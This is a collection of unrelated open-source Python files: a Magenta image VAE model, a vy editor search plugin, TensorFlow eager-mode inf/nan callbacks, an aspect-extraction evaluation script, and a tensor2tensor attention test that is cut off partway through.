convert_dollars_to_cents(dollars)
|
magenta/models/svg_vae/image_vae.py | sandutsar/magenta | 16,143 | 12739163 | <reponame>sandutsar/magenta
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines the ImageVAE model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from magenta.models.image_stylization import ops
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import estimator as tf_estimator
import tensorflow_probability as tfp
tfd = tfp.distributions
def _softplus_inverse(x):
"""Helper which computes the function inverse of `tf.nn.softplus`."""
return tf.log(tf.math.expm1(x))
@registry.register_model
class ImageVAE(t2t_model.T2TModel):
"""Defines the ImageVAE model."""
def bottom(self, features):
# inputs and targets should all be images, no preprocessing needed.
# but we do need to resize them to 64x64.
transformed_features = collections.OrderedDict()
transformed_features['targets'] = features['targets']
transformed_features['inputs'] = features['inputs']
transformed_features['cls'] = features['targets_cls']
if 'bottleneck' in features:
transformed_features['bottleneck'] = features['bottleneck']
return transformed_features
def body(self, features):
train = self._hparams.mode == tf_estimator.ModeKeys.TRAIN
return self.vae_internal(features, self._hparams, train)
def top(self, body_output, features):
# body_output should be a dict with 'outputs', which will be an image.
# no postprocessing needed.
return body_output
def loss(self, logits, features):
# logits should be dict with 'outputs', which is image.
targets = tf.reshape(features['targets'], [-1, 64, 64, 1])
weights = common_layers.weights_all(targets)
loss_num = tf.pow(logits - targets, 2)
return tf.reduce_sum(loss_num * weights), tf.reduce_sum(weights)
def vae_internal(self, features, hparams, train):
# inputs and targets should both be images with dims [batch, 64, 64, 1]
inputs, targets = features['inputs'], features['targets']
inputs = tf.reshape(inputs, [-1, 64, 64, 1])
targets = tf.reshape(targets, [-1, 64, 64, 1])
clss = features['cls']
with tf.variable_scope('vae_internal', reuse=tf.AUTO_REUSE):
# encoder
enc_out = self.visual_encoder(inputs, clss, hparams, train)
enc_out = tf.reshape(enc_out, [-1, 2 * hparams.bottleneck_bits])
# bottleneck
sampled_bottleneck, b_loss = self.bottleneck(enc_out)
losses = {'bottleneck_kl': tf.reduce_mean(b_loss)}
if 'bottleneck' in features:
if common_layers.shape_list(features['bottleneck'])[0] == 0:
# return bottleneck for interpolation
# set losses['training'] = 0 so top() isn't called on it
# potential todo: use losses dict so we have kl_loss here for non stop
# gradient models
return sampled_bottleneck, {'training': 0.0}
else:
# we want to use the given bottleneck
sampled_bottleneck = features['bottleneck']
# finalize bottleneck
unbottleneck = sampled_bottleneck
# decoder.
dec_out = self.visual_decoder(unbottleneck, clss, hparams)
      # calculate the training loss
rec_loss = -dec_out.log_prob(inputs)
elbo = tf.reduce_mean(-(b_loss + rec_loss))
losses['rec_loss'] = tf.reduce_mean(rec_loss)
losses['training'] = -elbo
if (not hasattr(self, 'summarized_imgs')
and self._hparams.mode != tf_estimator.ModeKeys.PREDICT):
self.summarized_imgs = True
with tf.name_scope(None), tf.name_scope('train' if train else 'test'):
tf.summary.image('rendered_out', dec_out.mean())
tf.summary.image('rendered_og', inputs)
return dec_out.mean(), losses
def bottleneck(self, x):
z_size = self.hparams.bottleneck_bits
x_shape = common_layers.shape_list(x)
with tf.variable_scope('bottleneck', reuse=tf.AUTO_REUSE):
mu = x[..., :self.hparams.bottleneck_bits]
if self.hparams.mode != tf_estimator.ModeKeys.TRAIN:
return mu, 0.0 # No sampling or kl loss on eval.
log_sigma = x[..., self.hparams.bottleneck_bits:]
epsilon = tf.random_normal(x_shape[:-1] + [z_size])
z = mu + tf.exp(log_sigma / 2) * epsilon
kl = 0.5 * tf.reduce_mean(
tf.exp(log_sigma) + tf.square(mu) - 1. - log_sigma, axis=-1)
# This is the 'free bits' trick mentioned in Kingma et al. (2016)
free_bits = self.hparams.free_bits
kl_loss = tf.reduce_mean(tf.maximum(kl - free_bits, 0.0))
return z, kl_loss * self.hparams.kl_beta
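  # Descriptive note (added, not from the original source): the bottleneck above
  # uses the reparameterization trick, z = mu + exp(log_sigma / 2) * epsilon, so
  # gradients flow through mu and log_sigma, and the KL term (averaged over the
  # latent dimensions) is only penalized beyond `free_bits` nats via tf.maximum.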
def visual_encoder(self, inputs, clss, hparams, train):
del train
# goes from [batch, 64, 64, 1] to [batch, hidden_size]
with tf.variable_scope('visual_encoder', reuse=tf.AUTO_REUSE):
ret = inputs
clss = tf.reshape(clss, [-1])
# conv layer, followed by instance norm + FiLM
ret = tf.layers.Conv2D(hparams.base_depth, 5, 1,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(2 * hparams.base_depth, 5, 1,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(2 * hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new conv layer, to bring shape down
ret = tf.layers.Conv2D(2 * hparams.bottleneck_bits, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new conv layer, to bring shape down
ret = tf.layers.Conv2D(2 * hparams.bottleneck_bits, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# ret has 1024
ret = tf.layers.flatten(ret)
ret = tf.layers.dense(ret, 2 * hparams.bottleneck_bits, activation=None)
return ret
def visual_decoder(self, bottleneck, clss, hparams):
# goes from [batch, bottleneck_bits] to [batch, 64, 64, 1]
with tf.variable_scope('visual_decoder', reuse=tf.AUTO_REUSE):
# unbottleneck
ret = tf.layers.dense(bottleneck, 1024, activation=None)
ret = tf.reshape(ret, [-1, 4, 4, 64])
clss = tf.reshape(clss, [-1])
# new deconv to bring shape up
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
# new deconv to bring shape up
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 4, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(2 * hparams.base_depth, 5, 2,
padding='SAME', activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, 2, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2DTranspose(hparams.base_depth, 5, padding='SAME',
activation=None)(ret)
ret = ops.conditional_instance_norm(ret, clss, hparams.num_categories)
ret = tf.nn.relu(ret)
ret = tf.layers.Conv2D(1, 5, padding='SAME', activation=None)(ret)
ret = tfd.Independent(tfd.Bernoulli(logits=ret),
reinterpreted_batch_ndims=3,
name='image')
return ret
@registry.register_hparams
def image_vae():
"""Basic Image VAE model hparams."""
hparams = common_hparams.basic_params1()
hparams.daisy_chain_variables = False
hparams.batch_size = 64
hparams.hidden_size = 32
hparams.initializer = 'uniform_unit_scaling'
hparams.initializer_gain = 1.0
hparams.weight_decay = 0.0
# VAE hparams
hparams.add_hparam('base_depth', 32)
hparams.add_hparam('bottleneck_bits', 32)
# loss hparams
hparams.add_hparam('kl_beta', 300)
hparams.add_hparam('free_bits_div', 4)
hparams.add_hparam('free_bits', 0.15)
# data format hparams
hparams.add_hparam('num_categories', 62)
# problem hparams (required, don't modify)
hparams.add_hparam('absolute', False)
hparams.add_hparam('just_render', True)
hparams.add_hparam('plus_render', False)
return hparams
|
vyapp/plugins/fstmt.py | iogf/vy | 927 | 12739165 | <gh_stars>100-1000
"""
Overview
========
Find where patterns are found, this plugin uses silver searcher to search
for word patterns. It is useful to find where functions/methods
are used over multiple files.
Key-Commands
============
Namespace: fstmt
Mode: NORMAL
Event: <Control-z>
Description: Same as <Key-Z> but matches case-insensitively.
Mode: NORMAL
Event: <Key-z>
Description: Open the previous found pattern occurrences.
Mode: NORMAL
Event: <Key-Z>
Description: Get the string under the cursor and perform
a case sensitive and resursive search in the current project file directory.
It grabs the string under the cursor only if there is no selected text.
The search is performed in the current project folder; if fstmt can't find a .git,
.svn, or .hg directory, it performs the search in the vy HOME directory.
"""
from subprocess import Popen, STDOUT, PIPE
from vyapp.widgets import LinePicker
from vyapp.areavi import AreaVi
from re import findall, escape
from vyapp.stderr import printd
from vyapp.app import root
class Fstmt:
options = LinePicker()
path = 'ag'
def __init__(self, area):
self.area = area
area.install('fstmt',
('NORMAL', '<Key-z>', lambda event: self.options.display()),
('NORMAL', '<Control-z>', lambda event: self.picker('-i')),
('NORMAL', '<Key-Z>', lambda event: self.picker('-s')))
@classmethod
def c_path(cls, path='ag'):
cls.path = path
printd('Fstmt - Setting ag path = ', path)
def catch_pattern(self):
pattern = self.area.join_ranges('sel')
pattern = pattern if pattern else self.area.get(
*self.area.get_word_range())
pattern = escape(pattern)
return pattern
def make_cmd(self, pattern, dir, *args):
cmd = [Fstmt.path, '--nocolor', '--nogroup',
'--vimgrep', '--noheading']
cmd.extend(args)
cmd.extend([pattern, dir])
return cmd
def run_cmd(self, pattern, *args):
dir = self.area.project
dir = dir if dir else AreaVi.HOME
dir = dir if dir else self.area.filename
child = Popen(self.make_cmd(pattern, dir, *args), stdout=PIPE,
stderr=STDOUT, encoding=self.area.charset)
regex = '(.+):([0-9]+):[0-9]+:(.+)'
ranges = findall(regex, child.communicate()[0])
if ranges:
self.options(ranges)
else:
root.status.set_msg('No pattern found!')
def picker(self, *args):
pattern = self.catch_pattern()
if not pattern:
root.status.set_msg('No pattern set!')
else:
self.run_cmd(pattern, *args)
|
tensorflow/python/eager/execution_callbacks.py | ryorda/tensorflow-viennacl | 522 | 12739187 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Execution Callbacks for Eager Mode."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.platform import tf_logging as logging
_DEFAULT_CALLBACK_ACTION = "raise"
_VALID_CALLBACK_ACTIONS = (None, "ignore", "print", "raise", "warn")
# TODO(cais): Consider moving this exception class to errors_impl.py.
class InfOrNanError(Exception):
"""Exception for inf and/or nan being present in tensor."""
def __init__(self,
op_type,
op_name,
output_index,
num_outputs,
value):
"""Constructor of InfOrNanError.
Args:
op_type: Type name of the op that generated the tensor that generated the
`inf`(s) or `nan`(s) (e.g., `Div`).
op_name: Name of the op that generated the tensor with `inf`(s) or
`nan`(s). This name is set by client and can be `None` if it is unset.
output_index: The 0-based output index of the tensor that contains
`inf`(s) or `nan`(s).
num_outputs: Total number of outputs of the operation.
value: The tensor value that contains `inf`(s) or `nan`(s).
"""
self._op_type = op_type
self._op_name = op_name
self._output_index = output_index
self._num_outputs = num_outputs
self._value = value
self._total_count = np.size(value)
self._inf_count = np.count_nonzero(np.isinf(value))
self._nan_count = np.count_nonzero(np.isnan(value))
super(InfOrNanError, self).__init__(self._get_error_message())
def _get_error_message(self):
"""Get the error message describing this InfOrNanError object."""
name_str = (("'%s'" % self._op_name) if self._op_name is not None
else str(self._op_name))
msg = "Output %d of %d of TFE operation %s (name: %s) contains " % (
self._output_index + 1, self._num_outputs, self._op_type, name_str)
if self._inf_count and self._nan_count:
msg += "%d inf(s) and %d nan(s) " % (self._inf_count, self._nan_count)
elif self._inf_count:
msg += "%d inf(s) " % self._inf_count
else:
msg += "%d nan(s) " % self._nan_count
msg += "out of a total of %d element(s). Tensor value: %s" % (
self._total_count, self._value)
return msg
@property
def op_type(self):
return self._op_type
@property
def op_name(self):
return self._op_name
@property
def output_index(self):
return self._output_index
@property
def num_outputs(self):
return self._num_outputs
@property
def value(self):
return self._value
def inf_nan_callback(op_type,
op_name,
attrs,
inputs,
outputs,
check_inf=True,
check_nan=True,
action=_DEFAULT_CALLBACK_ACTION):
"""An execution callback that checks for `inf`s and `nan`s in output tensors.
  This callback can be used with `tfe.add_execution_callback` to check for invalid
numeric values. E.g.,
```python
  tfe.add_execution_callback(tfe.inf_nan_callback)
```
Args:
op_type: Name of the TFE operation type (e.g., `MatMul`).
op_name: Name of the TFE operation. This name is set by client and can be
      `None` if it is unset.
attrs: Attributes of the TFE operation, as a tuple of alternating attribute
names and attribute values.
inputs: The `list` of input tensors to the operation, currently unused by
this callback.
outputs: The `list` of output tensors from the operation, checked by this
callback for `inf` and `nan` values.
check_inf: (`bool`) Whether this callback should check for `inf` values in
the output tensor values.
check_nan: (`bool`) Whether this callback should check for `nan` values in
the output tensor values.
action: (`str`) Action to be taken by the callback when `inf` or `nan`
values are detected. Possible values {"raise", "warn", "print"}
`"raise"`: Raise a `InfOrNanError`.
`"warn"`: Log a warning using `tf.logging.warn`.
`"print"`: Print a message to `sys.stdout`.
Raises:
InfOrNanError: iff `inf` or `nan` values are seen in any of `outputs` and
`action` is `"raise"`.
ValueError: iff the value of `action` is invalid.
"""
del attrs, inputs # Not used.
ctx = context.get_default_context()
for index, output in enumerate(outputs):
if not output.dtype.is_numpy_compatible:
continue
numpy_dtype = output.dtype.as_numpy_dtype
if (np.issubdtype(numpy_dtype, np.float) or
np.issubdtype(numpy_dtype, np.complex) or
np.issubdtype(numpy_dtype, np.integer)):
try:
check_numerics_op_attrs = (
"message", "Eager-mode inf/nan check",
"T", outputs[0].dtype.as_datatype_enum)
# TODO(cais): Consider moving this into execute.py.
# pylint: disable=protected-access
pywrap_tensorflow.TFE_Py_Execute(
ctx._handle, output.device, "CheckNumerics", [output],
check_numerics_op_attrs, 1)
# pylint: enable=protected-access
except core._NotOkStatusException: # pylint: disable=protected-access
value = output.numpy()
inf_detected = np.any(np.isinf(value)) and check_inf
nan_detected = np.any(np.isnan(value)) and check_nan
if not inf_detected and not nan_detected:
continue
error = InfOrNanError(op_type, op_name, index, len(outputs), value)
if action == "print":
print("Warning: %s" % str(error))
elif action == "warn":
logging.warn(str(error))
elif action == "raise":
raise error
else:
raise ValueError(
"Invalid action for inf_nan_callback: %s. Valid actions are: "
"{print | warn | raise}" % action)
def inf_callback(op_type,
op_name,
attrs,
inputs,
outputs,
action=_DEFAULT_CALLBACK_ACTION):
"""A specialization of `inf_nan_callback` that checks for `inf`s only."""
inf_nan_callback(
op_type, op_name, attrs, inputs, outputs, check_inf=True, check_nan=False,
action=action)
def nan_callback(op_type,
op_name,
attrs,
inputs,
outputs,
action=_DEFAULT_CALLBACK_ACTION):
"""A specialization of `inf_nan_callback` that checks for `nan`s only."""
inf_nan_callback(
op_type, op_name, attrs, inputs, outputs, check_inf=False, check_nan=True,
action=action)
def add_execution_callback(callback):
"""Add an execution callback to the default eager context.
An execution callback is invoked immediately after an eager operation or
  function has finished execution, providing access to the op's type, name,
  input and output tensors. Multiple execution callbacks can be added, in
which case the callbacks will be invoked in the order in which they are
added. To clear all execution callbacks that have been added, use
`clear_execution_callbacks()`.
Example:
```python
def print_even_callback(op_type, op_name, attrs, inputs, outputs):
# A callback that prints only the even output values.
if outputs[0].numpy() % 2 == 0:
print("Even output from %s: %s" % (op_name or op_type, outputs))
tfe.add_execution_callback(print_even_callback)
x = tf.pow(2.0, 3.0) - 3.0
y = tf.multiply(x, tf.add(1.0, 5.0))
# When the line above is run, you will see all intermediate outputs that are
# even numbers printed to the console.
tfe.clear_execution_callbacks()
```
Args:
callback: a callable of the signature
`f(op_type, op_name, attrs, inputs, outputs)`.
`op_type` is the type of the operation that was just executed (e.g.,
`MatMul`).
      `op_name` is the name of the operation that was just executed. This
name is set by the client who created the operation and can be `None` if
it is unset.
`attrs` contains the attributes of the operation as a `tuple` of
alternating attribute name and attribute value.
`inputs` is the `list` of input `Tensor`(s) to the op.
`outputs` is the `list` of output `Tensor`(s) from the op.
Return value(s) from the callback are ignored.
"""
context.get_default_context().add_post_execution_callback(callback)
def clear_execution_callbacks():
"""Clear all execution callbacks from the default eager context."""
context.get_default_context().clear_post_execution_callbacks()
def seterr(inf_or_nan=None):
"""Set how abnormal conditions are handled by the default eager context.
Example:
```python
tfe.seterr(inf_or_nan="raise")
a = tf.constant(10.0)
b = tf.constant(0.0)
try:
c = a / b # <-- Raises InfOrNanError.
except Exception as e:
print("Caught Exception: %s" % e)
tfe.seterr(inf_or_nan="ignore")
c = a / b # <-- Does NOT raise exception anymore.
```
Args:
inf_or_nan: Set action for infinity (`inf`) and NaN (`nan`) values.
Possible values: `{"ignore", "print", "raise", "warn"}`.
`"ignore"`: take no action when `inf` values appear.
`"print"`: print a warning to `stdout`.
`"raise"`: raise an `InfOrNanError`.
`"warn"`: print a warning using `tf.logging.warn`.
A value of `None` leads to no change in the action of the condition.
Returns:
A dictionary of old actions.
Raises:
ValueError: If the value of any keyword arguments is invalid.
"""
if inf_or_nan not in _VALID_CALLBACK_ACTIONS:
raise ValueError(
"Invalid action value for inf_or_nan: %s. "
"Valid actions are %s." % (inf_or_nan, _VALID_CALLBACK_ACTIONS))
old_settings = {"inf_or_nan": "ignore"}
default_context = context.get_default_context()
carryover_callbacks = []
for callback in default_context.post_execution_callbacks:
# Check whether the callback is inf_nan_callback or a partial object of
# inf_nan_callback.
if (callback == inf_nan_callback or
isinstance(callback, functools.partial) and
callback.func == inf_nan_callback):
if callback == inf_nan_callback:
old_settings["inf_or_nan"] = _DEFAULT_CALLBACK_ACTION
else:
old_settings["inf_or_nan"] = callback.keywords.get(
"action", _DEFAULT_CALLBACK_ACTION)
elif inf_or_nan is not None:
carryover_callbacks.append(callback)
if inf_or_nan is not None:
default_context.clear_post_execution_callbacks()
for callback in carryover_callbacks:
default_context.add_post_execution_callback(callback)
if inf_or_nan != "ignore":
default_context.add_post_execution_callback(
functools.partial(inf_nan_callback, action=inf_or_nan))
return old_settings
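# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module): combining the APIs
# above by installing inf_nan_callback with a non-default action through
# add_execution_callback. Assumes eager execution is enabled and this module
# is importable as `tfe` (e.g. via `tf.contrib.eager`):
#
#   import functools
#   import tensorflow as tf
#   tf.enable_eager_execution()
#   tfe.add_execution_callback(
#       functools.partial(tfe.inf_nan_callback, action="warn"))
#   tf.constant(1.0) / tf.constant(0.0)   # logs a warning instead of raising
#   tfe.clear_execution_callbacks()
# ---------------------------------------------------------------------------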
|
code/evaluation.py | saurabhgupta17888/Unsupervised-Aspect-Extraction | 338 | 12739189 | import argparse
import logging
import numpy as np
from time import time
import utils as U
from sklearn.metrics import classification_report
import codecs
######### Get hyper-params in order to rebuild the model architecture ###########
# The hyper parameters should be exactly the same as those used for training
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--out-dir", dest="out_dir_path", type=str, metavar='<str>', required=True, help="The path to the output directory")
parser.add_argument("-e", "--embdim", dest="emb_dim", type=int, metavar='<int>', default=200, help="Embeddings dimension (default=200)")
parser.add_argument("-b", "--batch-size", dest="batch_size", type=int, metavar='<int>', default=50, help="Batch size (default=50)")
parser.add_argument("-v", "--vocab-size", dest="vocab_size", type=int, metavar='<int>', default=9000, help="Vocab size. '0' means no limit (default=9000)")
parser.add_argument("-as", "--aspect-size", dest="aspect_size", type=int, metavar='<int>', default=14, help="The number of aspects specified by users (default=14)")
parser.add_argument("--emb", dest="emb_path", type=str, metavar='<str>', help="The path to the word embeddings file")
parser.add_argument("--epochs", dest="epochs", type=int, metavar='<int>', default=15, help="Number of epochs (default=15)")
parser.add_argument("-n", "--neg-size", dest="neg_size", type=int, metavar='<int>', default=20, help="Number of negative instances (default=20)")
parser.add_argument("--maxlen", dest="maxlen", type=int, metavar='<int>', default=0, help="Maximum allowed number of words during training. '0' means no limit (default=0)")
parser.add_argument("--seed", dest="seed", type=int, metavar='<int>', default=1234, help="Random seed (default=1234)")
parser.add_argument("-a", "--algorithm", dest="algorithm", type=str, metavar='<str>', default='adam', help="Optimization algorithm (rmsprop|sgd|adagrad|adadelta|adam|adamax) (default=adam)")
parser.add_argument("--domain", dest="domain", type=str, metavar='<str>', default='restaurant', help="domain of the corpus {restaurant, beer}")
parser.add_argument("--ortho-reg", dest="ortho_reg", type=float, metavar='<float>', default=0.1, help="The weight of orthogonal regularization (default=0.1)")
args = parser.parse_args()
out_dir = args.out_dir_path + '/' + args.domain
# out_dir = '../pre_trained_model/' + args.domain
U.print_args(args)
assert args.algorithm in {'rmsprop', 'sgd', 'adagrad', 'adadelta', 'adam', 'adamax'}
assert args.domain in {'restaurant', 'beer'}
from keras.preprocessing import sequence
import reader as dataset
###### Get test data #############
vocab, train_x, test_x, overall_maxlen = dataset.get_data(args.domain, vocab_size=args.vocab_size, maxlen=args.maxlen)
test_x = sequence.pad_sequences(test_x, maxlen=overall_maxlen)
############# Build model architecture, same as the model used for training #########
from model import create_model
import keras.backend as K
from optimizers import get_optimizer
optimizer = get_optimizer(args)
def max_margin_loss(y_true, y_pred):
return K.mean(y_pred)
model = create_model(args, overall_maxlen, vocab)
## Load the save model parameters
model.load_weights(out_dir+'/model_param')
model.compile(optimizer=optimizer, loss=max_margin_loss, metrics=[max_margin_loss])
################ Evaluation ####################################
def evaluation(true, predict, domain):
true_label = []
predict_label = []
if domain == 'restaurant':
for line in predict:
predict_label.append(line.strip())
for line in true:
true_label.append(line.strip())
print(classification_report(true_label, predict_label,
['Food', 'Staff', 'Ambience', 'Anecdotes', 'Price', 'Miscellaneous'], digits=3))
else:
for line in predict:
label = line.strip()
if label == 'smell' or label == 'taste':
label = 'taste+smell'
predict_label.append(label)
for line in true:
label = line.strip()
if label == 'smell' or label == 'taste':
label = 'taste+smell'
true_label.append(label)
print(classification_report(true_label, predict_label,
['feel', 'taste+smell', 'look', 'overall', 'None'], digits=3))
def prediction(test_labels, aspect_probs, cluster_map, domain):
label_ids = np.argsort(aspect_probs, axis=1)[:,-1]
predict_labels = [cluster_map[label_id] for label_id in label_ids]
evaluation(open(test_labels), predict_labels, domain)
## Create a dictionary that map word index to word
vocab_inv = {}
for w, ind in vocab.items():
vocab_inv[ind] = w
test_fn = K.function([model.get_layer('sentence_input').input, K.learning_phase()],
[model.get_layer('att_weights').output, model.get_layer('p_t').output])
att_weights, aspect_probs = test_fn([test_x, 0])
## Save attention weights on test sentences into a file
att_out = codecs.open(out_dir + '/att_weights', 'w', 'utf-8')
print('Saving attention weights on test sentences...')
for c in range(len(test_x)):
att_out.write('----------------------------------------\n')
att_out.write(str(c) + '\n')
word_inds = [i for i in test_x[c] if i!=0]
line_len = len(word_inds)
weights = att_weights[c]
weights = weights[(overall_maxlen-line_len):]
words = [vocab_inv[i] for i in word_inds]
att_out.write(' '.join(words) + '\n')
for j in range(len(words)):
att_out.write(words[j] + ' '+str(round(weights[j], 3)) + '\n')
######################################################
# Uncomment the below part for F scores
######################################################
## cluster_map need to be specified manually according to the top words in each inferred aspect (save in aspect.log)
# map for the pre-trained restaurant model (under pre_trained_model/restaurant)
# cluster_map = {0: 'Food', 1: 'Miscellaneous', 2: 'Miscellaneous', 3: 'Food',
# 4: 'Miscellaneous', 5: 'Food', 6:'Price', 7: 'Miscellaneous', 8: 'Staff',
# 9: 'Food', 10: 'Food', 11: 'Anecdotes',
# 12: 'Ambience', 13: 'Staff'}
# print '--- Results on %s domain ---' % (args.domain)
# test_labels = '../preprocessed_data/%s/test_label.txt' % (args.domain)
# prediction(test_labels, aspect_probs, cluster_map, domain=args.domain)
|
tensor2tensor/layers/common_image_attention_test.py | jaseweir/tensor2tensor | 12,921 | 12739244 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for common image attention utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_image_attention
from tensor2tensor.utils import hparam
import tensorflow.compat.v1 as tf
class CommonImageAttentionTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testPostProcessImageTrainMode(self, likelihood, num_mixtures, depth):
batch = 1
rows = 8
cols = 24
hparams = hparam.HParams(
hidden_size=2,
likelihood=likelihood,
mode=tf.estimator.ModeKeys.TRAIN,
num_mixtures=num_mixtures,
)
inputs = tf.random_uniform([batch, rows, cols, hparams.hidden_size],
minval=-1., maxval=1.)
outputs = common_image_attention.postprocess_image(
inputs, rows, cols, hparams)
self.assertEqual(outputs.shape, (batch, rows, cols, depth))
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testPostProcessImageInferMode(self, likelihood, num_mixtures, depth):
batch = 1
rows = 8
cols = 24
block_length = 4
block_width = 2
hparams = hparam.HParams(
block_raster_scan=True,
hidden_size=2,
likelihood=likelihood,
mode=tf.estimator.ModeKeys.PREDICT,
num_mixtures=num_mixtures,
query_shape=[block_length, block_width],
)
inputs = tf.random_uniform([batch, rows, cols, hparams.hidden_size],
minval=-1., maxval=1.)
outputs = common_image_attention.postprocess_image(
inputs, rows, cols, hparams)
num_blocks_rows = rows // block_length
num_blocks_cols = cols // block_width
self.assertEqual(outputs.shape,
(batch, num_blocks_rows, num_blocks_cols,
block_length, block_width, depth))
@parameterized.parameters(
(common_image_attention.DistributionType.DMOL, 5, 50),
(common_image_attention.DistributionType.CAT, None, 256),
)
def testCreateOutputTrainMode(self, likelihood, num_mixtures, depth):
batch = 1
height = 8
width = 8
channels = 3
rows = height
if likelihood == common_image_attention.DistributionType.CAT:
cols = channels * width
else:
cols = width
hparams = hparam.HParams(
hidden_size=2,
likelihood=likelihood,
num_channels=channels,
mode=tf.estimator.ModeKeys.TRAIN,
num_mixtures=num_mixtures,
)
decoder_output = tf.random_normal([batch, rows, cols, hparams.hidden_size])
targets = tf.random_uniform([batch, height, width, channels],
minval=-1., maxval=1.)
output = common_image_attention.create_output(
decoder_output, rows, cols, targets, hparams)
if hparams.likelihood == common_image_attention.DistributionType.CAT:
self.assertEqual(output.shape, (batch, height, width, channels, depth))
else:
self.assertEqual(output.shape, (batch, height, width, depth))
def testTransformerDecoderLayersGlobal(self):
one_hot_data = tf.constant([[[0., 1.], [1., 0.]],
[[0., 1.], [1., 0.]],
[[1., 0.], [1., 0.]]])
hparams = common_hparams.basic_params1()
hparams.hidden_size = 4
hparams.num_layers = 1
hparams.layer_prepostprocess_dropout = 0.
hparams.add_hparam("attention_key_channels", None)
hparams.add_hparam("attention_value_channels", None)
hparams.add_hparam("num_heads", 1)
hparams.add_hparam("attention_dropout", 0.)
hparams.add_hparam("shared_rel", False)
hparams.add_hparam("block_width", 1)
hparams.add_hparam("block_length", 1)
hparams.add_hparam("q_filter_width", 1)
hparams.add_hparam("kv_filter_width", 1)
hparams.add_hparam("filter_size", 16)
hparams.add_hparam("ffn_layer", "conv_hidden_relu")
hparams.add_hparam("relu_dropout", 0.)
conv_1d = tf.keras.layers.Conv1D(filters=hparams.hidden_size,
kernel_size=1,
use_bias=False)
shifted_data = tf.pad(one_hot_data, [[0, 0], [1, 0], [0, 0]])[..., :-1, :]
net = conv_1d(shifted_data)
output = common_image_attention.transformer_decoder_layers(
inputs=net,
encoder_output=None,
num_layers=hparams.num_layers,
hparams=hparams,
self_attention_bias=common_image_attention.get_self_attention_bias(net),
attention_type=common_image_attention.AttentionType.GLOBAL)
self.evaluate(tf.global_variables_initializer())
output_val = self.evaluate(output)
# The outputs for the padded dimension should be equal across all data.
self.assertAllEqual(output_val[0, 0], output_val[1, 0])
self.assertAllEqual(output_val[1, 0], output_val[2, 0])
# The first and second elements of the batch are identical, so they should
# have the same outputs for the second latent dimension as well.
